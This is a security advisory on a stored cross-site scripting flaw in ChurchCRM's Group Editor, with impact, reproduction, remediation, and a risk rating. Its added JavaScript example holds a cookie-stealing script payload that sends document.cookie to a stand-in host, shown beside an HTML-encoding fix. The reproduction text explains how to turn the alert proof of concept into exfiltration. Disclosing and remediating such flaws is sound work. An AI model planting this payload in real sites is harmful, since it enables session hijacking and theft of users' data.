ChurchCRM Stored Cross-Site Scripting Vulnerability in Group Editor Allowing Session Hijacking

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions up to and including 5.13.0, in the Group Editor page. The group description field is stored without adequate sanitization and rendered without output encoding, so a user with administrator privileges can save JavaScript in it. The script then executes in the browser of every user who views that group, where it can read the session cookie (where the cookie is not marked HttpOnly) and send it to an attacker-controlled server. With the stolen cookie the attacker can hijack that session, impersonate the user, and access whatever data the user can. Note that injection requires an existing admin account, so the attacker is a malicious or compromised administrator, but the payload fires for any authenticated user who opens the affected group page, including other administrators.

Impact

Successful exploitation lets an attacker capture an authenticated user's session cookie and reuse it to take over that session, gaining the victim's access to the application and to any sensitive information the victim can see. Because the payload is stored, it runs in the browser of every user who opens the affected group page rather than only a single targeted user. Even where cookie theft is prevented by the HttpOnly attribute, the injected script still runs with the victim's privileges in the victim's browser and can issue authenticated requests on their behalf.

Reproduction

To reproduce this vulnerability, log in as an administrator and open the Group Editor page for a group. Enter a script payload in the description field, for example a <script> element that reads document.cookie and, for the proof of concept, displays it with alert(). Save the form. When the group page is next rendered, the stored script executes and shows the session cookie, confirming the stored XSS. Replacing alert() with a request to an external server turns the same payload into cookie exfiltration, and the captured cookie can then be replayed to hijack the session.

Remediation

To address this vulnerability, ChurchCRM should HTML-encode the description field (and other user-controlled fields) at output time, using encoding appropriate to the context in which the value is rendered, rather than relying on input filtering alone. User input should additionally be validated and sanitized on the server as defense in depth. The session cookie should be set with the 'HttpOnly' and 'Secure' attributes so that injected script cannot read it through document.cookie and it is only sent over HTTPS. Note that HttpOnly blunts cookie theft but does not remove the XSS itself; output encoding is the actual fix.
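The following is an added example, not code from ChurchCRM or from the original advisory. It models the Reproduction and Remediation sections in one place: a stored description containing a cookie-stealing payload of the kind described above is rendered first without output encoding (the vulnerable behaviour) and then with HTML encoding (the fix), and a helper builds the session cookie attributes the remediation recommends. All function names, the collector.example host, the PHPSESSID cookie name, and the sample payload are constructed assumptions for illustration; they are not ChurchCRM identifiers.

```javascript
// Added example (not ChurchCRM's code): minimal model of rendering a stored
// group description without and with output encoding, plus the session
// cookie attributes recommended in the Remediation section. All names and
// the sample payload below are constructed for illustration.

// Payload of the kind the Reproduction section describes. Stored in the
// description field, it runs in the browser of anyone who views the group
// and ships document.cookie to an attacker-controlled host (assumed name).
const STORED_PAYLOAD =
  "<script>new Image().src='https://collector.example/?c='+encodeURIComponent(document.cookie)</script>";

// Vulnerable rendering: the stored description is interpolated into the
// HTML as-is, so the <script> element becomes part of the page.
function renderDescriptionUnsafe(description) {
  return `<div class="group-description">${description}</div>`;
}

// Output encoding for an HTML text context: every character that could
// start a tag, entity or attribute delimiter is replaced by its entity.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: the same description, encoded at output time. The
// browser now shows the payload as text instead of executing it.
function renderDescriptionSafe(description) {
  return `<div class="group-description">${escapeHtml(description)}</div>`;
}

// Crude check: does the rendered HTML still contain an executable
// <script ...> start tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Session cookie attributes. HttpOnly keeps document.cookie from exposing
// the value to injected script; Secure restricts it to HTTPS; SameSite=Lax
// limits cross-site sending. HttpOnly blunts cookie theft but not the XSS
// itself: injected script can still send authenticated requests from the
// victim's page, so output encoding above is the actual fix.
function sessionCookieHeader(name, value, opts = {}) {
  const { httpOnly = true, secure = true, sameSite = 'Lax', path = '/' } = opts;
  const parts = [`${name}=${value}`, `Path=${path}`];
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Stand-alone demonstration of the three pieces.
console.log('unsafe :', renderDescriptionUnsafe(STORED_PAYLOAD));
console.log('safe   :', renderDescriptionSafe(STORED_PAYLOAD));
console.log('cookie :', sessionCookieHeader('PHPSESSID', 'abc123'));
```

The encoding function covers the HTML text context only; a description echoed into a JavaScript string, a URL, or an attribute value needs the encoder for that context, which is why the fix belongs at the point of output rather than at input.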

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 1.9
impact: 5.0
exploitability: 5.9
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 5.7
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.